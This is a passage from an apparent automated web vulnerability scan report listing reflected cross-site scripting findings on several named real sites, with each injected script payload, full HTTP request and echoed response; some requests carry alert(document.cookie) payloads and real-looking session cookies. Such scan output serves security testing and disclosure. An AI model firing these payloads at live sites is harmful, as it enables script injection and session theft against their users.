User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX8295a"><script>alert(1)</script>ab128e6cc17/473984052/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

4.79. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0658"><script>alert(1)</script>c1c3d6e2b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/@x94d0658"><script>alert(1)</script>c1c3d6e2b7 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:32:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 321
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/653717829/x94d0658"><script>alert(1)</script>c1c3d6e2b7/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG S
...[SNIP]...

4.80. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.abbreviations.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a0a26<script>alert(1)</script>d00f3446e86 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.abbreviations.com/p.json?callback=_ate.ad.hpra0a26<script>alert(1)</script>d00f3446e86&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F32&po6wxt HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 391
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 21:59:41 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 21:59:41 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295906381.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 11:56:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 21:59:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:59:41 GMT
Connection: close

_ate.ad.hpra0a26<script>alert(1)</script>d00f3446e86({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscript%253Ealert
...[SNIP]...

4.81. http://ds.addthis.com/red/psi/sites/www3.whdh.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www3.whdh.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff7e4<script>alert(1)</script>21aaae9acf7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www3.whdh.com/p.json?callback=_ate.ad.hprff7e4<script>alert(1)</script>21aaae9acf7&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww3.whdh.com%2Fmobile%2Fphoneforecast%2Fsettings.php%2F5bebc%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb51006e4a2e&ref=http%3A%2F%2Fburp%2Fshow%2F48&tb1nil HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; psc=4; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 25 Jan 2011 04:29:55 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 24 Feb 2011 04:29:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 25 Jan 2011 04:29:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:29:55 GMT
Connection: close

_ate.ad.hprff7e4<script>alert(1)</script>21aaae9acf7({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.82. https://fonts.googleapis.com/css [family parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://fonts.googleapis.com
Path:	/css

Issue detail

The value of the family request parameter is copied into the HTML document as plain text between tags. The payload b4d14<script>alert(1)</script>9fc417d1dbb was submitted in the family parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css?family=Cantarellb4d14<script>alert(1)</script>9fc417d1dbb HTTP/1.1
Host: fonts.googleapis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=UTF-8
Expires: Mon, 24 Jan 2011 15:11:56 GMT
Date: Mon, 24 Jan 2011 15:11:56 GMT
Cache-Control: private, max-age=86400
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

/* Cantarellb4d14<script>alert(1)</script>9fc417d1dbb (style: normal, weight: 400) is not available */
/* Not supported. */

4.83. http://help.tweetmeme.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5332"><script>alert(1)</script>43dac7f67f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5332\"><script>alert(1)</script>43dac7f67f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a5332"><script>alert(1)</script>43dac7f67f9=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=hvs2d5cp30e1hj10sbqrkjr2v4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?a5332\"><script>alert(1)</script>43dac7f67f9=1"/>
...[SNIP]...

4.84. http://help.tweetmeme.com/2009/04/07/api-documentation/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/07/api-documentation/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd1e"><script>alert(1)</script>1c4a5b86e64 was submitted in the REST URL parameter 4. This input was echoed as 3fd1e\"><script>alert(1)</script>1c4a5b86e64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/07/api-documentation3fd1e"><script>alert(1)</script>1c4a5b86e64/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=cmb3lt8g6m025676m7qpv6hnf2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/07/api-documentation3fd1e\"><script>alert(1)</script>1c4a5b86e64/"/>
...[SNIP]...

4.85. http://help.tweetmeme.com/2009/04/07/api-documentation/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/07/api-documentation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e07"><script>alert(1)</script>ffe8af704e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12e07\"><script>alert(1)</script>ffe8af704e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/07/api-documentation/?12e07"><script>alert(1)</script>ffe8af704e4=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=trme8mis9vb1hpv99lfq46a903; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/07/api-documentation/?12e07\"><script>alert(1)</script>ffe8af704e4=1"/>
...[SNIP]...

4.86. http://help.tweetmeme.com/2009/04/09/rss-feeds/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/rss-feeds/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228c5"><script>alert(1)</script>c8bff7fe0f0 was submitted in the REST URL parameter 4. This input was echoed as 228c5\"><script>alert(1)</script>c8bff7fe0f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/rss-feeds228c5"><script>alert(1)</script>c8bff7fe0f0/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jgu7690q9kkdm0pmlen86vtk86; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/rss-feeds228c5\"><script>alert(1)</script>c8bff7fe0f0/"/>
...[SNIP]...

4.87. http://help.tweetmeme.com/2009/04/09/rss-feeds/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/rss-feeds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189b3"><script>alert(1)</script>cebdedbe062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 189b3\"><script>alert(1)</script>cebdedbe062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/rss-feeds/?189b3"><script>alert(1)</script>cebdedbe062=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6nm3s8c2m6kieo9c2js0pht791; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/rss-feeds/?189b3\"><script>alert(1)</script>cebdedbe062=1"/>
...[SNIP]...

4.88. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/twitter-feeds/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3e0"><script>alert(1)</script>71466c94826 was submitted in the REST URL parameter 4. This input was echoed as 3f3e0\"><script>alert(1)</script>71466c94826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/twitter-feeds3f3e0"><script>alert(1)</script>71466c94826/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=u5kr3ba81i5sui0lphbs8feco5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/twitter-feeds3f3e0\"><script>alert(1)</script>71466c94826/"/>
...[SNIP]...

4.89. http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/2009/04/09/twitter-feeds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45199"><script>alert(1)</script>8351f254324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45199\"><script>alert(1)</script>8351f254324 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/09/twitter-feeds/?45199"><script>alert(1)</script>8351f254324=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=o74s3arn6v70f5unk3j55pvs93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/2009/04/09/twitter-feeds/?45199\"><script>alert(1)</script>8351f254324=1"/>
...[SNIP]...

4.90. http://help.tweetmeme.com/contact/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/contact/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0028"><script>alert(1)</script>fea05a9ad68 was submitted in the REST URL parameter 1. This input was echoed as f0028\"><script>alert(1)</script>fea05a9ad68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactf0028"><script>alert(1)</script>fea05a9ad68/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dnv19aatav99j4f9pibtsp58n3; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/contactf0028\"><script>alert(1)</script>fea05a9ad68/"/>
...[SNIP]...

4.91. http://help.tweetmeme.com/contact/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1468f"><script>alert(1)</script>2890b963226 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1468f\"><script>alert(1)</script>2890b963226 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?1468f"><script>alert(1)</script>2890b963226=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=vveg4dunt1reusi70esr0se9h5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/contact/?1468f\"><script>alert(1)</script>2890b963226=1"/>
...[SNIP]...

4.92. http://help.tweetmeme.com/faq [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/faq

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c426a"><script>alert(1)</script>ab1b8766548 was submitted in the REST URL parameter 1. This input was echoed as c426a\"><script>alert(1)</script>ab1b8766548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqc426a"><script>alert(1)</script>ab1b8766548 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:05:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6qomn42q02ru80d09qgl5bm125; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:05:20 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/faqc426a\"><script>alert(1)</script>ab1b8766548"/>
...[SNIP]...

4.93. http://help.tweetmeme.com/forum [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe3d"><script>alert(1)</script>faac14f3f1a was submitted in the REST URL parameter 1. This input was echoed as ebe3d\"><script>alert(1)</script>faac14f3f1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forumebe3d"><script>alert(1)</script>faac14f3f1a HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=7rhr8ug8ulb1snerfp4d9dq5f5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forumebe3d\"><script>alert(1)</script>faac14f3f1a"/>
...[SNIP]...

4.94. http://help.tweetmeme.com/forum [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e562a"><script>alert(1)</script>99f9c1b1735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e562a\"><script>alert(1)</script>99f9c1b1735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

